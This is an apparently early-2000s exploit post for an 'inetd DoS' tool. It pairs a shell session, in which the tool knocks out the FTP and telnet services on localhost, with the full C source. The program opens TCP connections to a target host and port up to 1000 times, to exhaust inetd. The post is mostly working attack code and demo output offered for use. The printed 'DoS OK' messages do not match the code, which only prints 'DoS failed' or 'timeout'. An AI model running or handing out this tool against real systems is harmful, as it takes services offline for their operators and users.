Name: inetd DoS exploit Author: Serega[Linux] [ser@ihg prog]$ ./pscaner -h 127.0.0.1 /* it's my port scaner */ Open ports on [127.0.0.1] ----------------------------- [21] OPEN : 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready. [23] OPEN : [25] OPEN : 220 ihg.localhost ESMTP Sendmail 8.11.0/8.11.0; Sun, 25 Feb 2001 18:58:36 +0300 ----------------------------- [ser@ihg prog]$ telnet 127.0.0.1 21 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready. [ser@ihg prog]$ cc inetddos.c -o inetddos [ser@ihg prog]$ ./inetddos 127.0.0.1 21 DoS OK [ser@ihg prog]$ telnet 127.0.0.1 21 Trying 127.0.0.1... telnet: Unable to connect to remote host: Connection refused [ser@ihg prog]$ telnet 127.0.0.1 23 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. login: [ser@ihg prog]$ ./inetddos 127.0.0.1 23 DoS OK [ser@ihg prog]$ telnet 127.0.0.1 23 Trying 127.0.0.1... telnet: Unable to connect to remote host: Connection refused -- /* * mailto:[EMAIL PROTECTED] * ICQ: 64432299 * Home Page: http://127.0.0.1 */
/* ---------------------------------- Inetd DoS exploit bY Serega[Linux] IHG Project www.ihgroup.ru mailto:[EMAIL PROTECTED] ---------------------------------- Usage: ./inetddos <host> <port> example: [ser@ihg prog]$ ./pscaner -h 127.0.0.1 ----------------------------- Open ports on [127.0.0.1] [21] OPEN : 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready. [23] OPEN : [25] OPEN : 220 ihg.localhost ESMTP Sendmail 8.11.0/8.11.0; Sun, 25 Feb 2001 18:58:36 +0300 ----------------------------- [ser@ihg prog]$ telnet 127.0.0.1 21 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready. [ser@ihg prog]$ cc inetddos.c -o inetddos [ser@ihg prog]$ ./inetddos 127.0.0.1 21 DoS OK [ser@ihg prog]$ telnet 127.0.0.1 21 Trying 127.0.0.1... telnet: Unable to connect to remote host: Connection refused [ser@ihg prog]$ telnet 127.0.0.1 23 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. login: [ser@ihg prog]$ ./inetddos 127.0.0.1 23 DoS OK [ser@ihg prog]$ telnet 127.0.0.1 23 Trying 127.0.0.1... telnet: Unable to connect to remote host: Connection refused */ #include <netdb.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h> #include <time.h> #include <signal.h> void time_out(int sig); int timeout=5; char logo[512]; int sockfd; DoS (char *host, int port) { unsigned long int ip_addr; struct sockaddr_in serv; struct hostent *h; unsigned long int rv; serv.sin_family = AF_INET; if ((h=gethostbyname(host)) == NULL) { close(sockfd); perror(host); exit(1); } if(h!=NULL) memcpy(&rv,h->h_addr,h->h_length); else rv=inet_addr(host); serv.sin_addr.s_addr = rv; serv.sin_port = htons(port); if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1) { perror ("socket error"); exit(1); } alarm(timeout); signal(SIGALRM, (void *)&time_out); if (connect (sockfd, (struct sockaddr*)&serv, sizeof(serv)) != 0) { close(sockfd); perror(host); exit(1); } alarm(0); close(sockfd); return(1); } void time_out (int sig) { close(sockfd); printf("timeout\n"); exit(-1); } usage(char *h) { printf("----------------------------------\nInetd DoS exploit bY Serega[Linux] IHG Project www.ihgroup.ru mailto:[EMAIL PROTECTED]\n----------------------------------\n"); printf("\nUsage: %s <host> <port>\n\n", h); exit(1); } main(int argc, char **argv) { int i; if (argc<3) usage(argv[0]); for (i=1; i<1000; i++) DoS(argv[1], atoi(argv[2])); printf("DoS failed\n"); }
